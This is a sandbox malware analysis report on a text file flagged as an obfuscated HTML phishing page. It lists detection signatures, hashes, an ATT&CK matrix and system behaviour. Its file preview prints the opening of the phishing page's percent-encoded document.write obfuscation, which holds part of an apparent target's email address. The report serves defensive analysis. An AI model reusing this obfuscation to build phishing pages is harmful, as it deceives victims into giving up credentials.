Analysis Report file.txt

Overview

General Information

Sample Name: file.txt
Analysis ID: 392880
MD5: 8896a1eb844cb01ce56eddfabe90282d
SHA1: 78b25819b6270edc53c5763719b5c9f81bc3f1ac
SHA256: 7db3772473959c79e30762b7f75bbca9abd8f41f1bd4e5530db7f63b3769f873

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish44
Yara detected obfuscated html page
Queries the volume information (name, serial number etc) of a device

Startup

  • System is w10x64
  • notepad.exe (PID: 3504 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\Desktop\file.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source   | Rule                     | Description                        | Author       | Strings
file.txt | JoeSecurity_Obshtml      | Yara detected obfuscated html page | Joe Security |
file.txt | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44         | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Phishing:

Yara detected HtmlPhish44
Source: Yara match; File source: file.txt, type: SAMPLE

Yara detected obfuscated html page
Source: Yara match; File source: file.txt, type: SAMPLE

Source: classification engine; Classification label: mal56.phis.winTXT@1/0@0/0
Source: C:\Windows\System32\notepad.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\notepad.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmp; Binary or memory string: Progman
Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
Source: C:\Windows\System32\notepad.exe; Queries volume information: C:\Users\user\Desktop\file.txt VolumeInformation

Mitre Att&ck Matrix

Tactic: techniques listed in the matrix (trailing digits are the report's per-technique signature counts)

Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Path Interception; Boot or Logon Initialization Scripts
Privilege Escalation: Process Injection 1; Boot or Logon Initialization Scripts
Defense Evasion: Process Injection 1; Rootkit
Credential Access: OS Credential Dumping; LSASS Memory
Discovery: Process Discovery 1; System Information Discovery 11
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Command and Control: Data Obfuscation; Junk Data
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization
Impact: Modify System Partition; Device Lockout

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 392880
Start date: 19.04.2021
Start time: 23:35:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: file.txt
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal56.phis.winTXT@1/0@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .txt
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: HTML document, ASCII text, with very long lines
Entropy (8bit): 3.4046831362921006
TrID:
File name: file.txt
File size: 14862
MD5: 8896a1eb844cb01ce56eddfabe90282d
SHA1: 78b25819b6270edc53c5763719b5c9f81bc3f1ac
SHA256: 7db3772473959c79e30762b7f75bbca9abd8f41f1bd4e5530db7f63b3769f873
SHA512: b8200ece81ebff8e4b654335d946e9e8c52336c28917fdc82a86ac73ab37dcc9e3fcf41638ca662b57dd4f72b9e75664a0097d0b12180e90b7bf075b875d2f36
SSDEEP: 192:ua/7cWZGSaQsbezjPQdzA68zM9oXC8M9hR8Zw5RmhLqa7oiSUy0/HA0:z944+zA68zGB8M9zkT75/A0
File Content Preview: <script language="javascript">........document.write(unescape('%3c%21%44%4f%43%54%59%50%45%20%68%74%6d%6c%3e%3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%6d%69%7a%7a%73%3d%22%72%68%61%6d%6d%6f%6e%64%40%74%62%63%6f%6e%73%75%6c%74

File Icon

Icon Hash: 74f4e4e4e4e4e4e4

Network Behavior

No network behavior found

System Behavior

General

Start time: 23:36:05
Start date: 19/04/2021
Path: C:\Windows\System32\notepad.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\Desktop\file.txt
Imagebase: 0x7ff7977d0000
File size: 245760 bytes
MD5 hash: BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
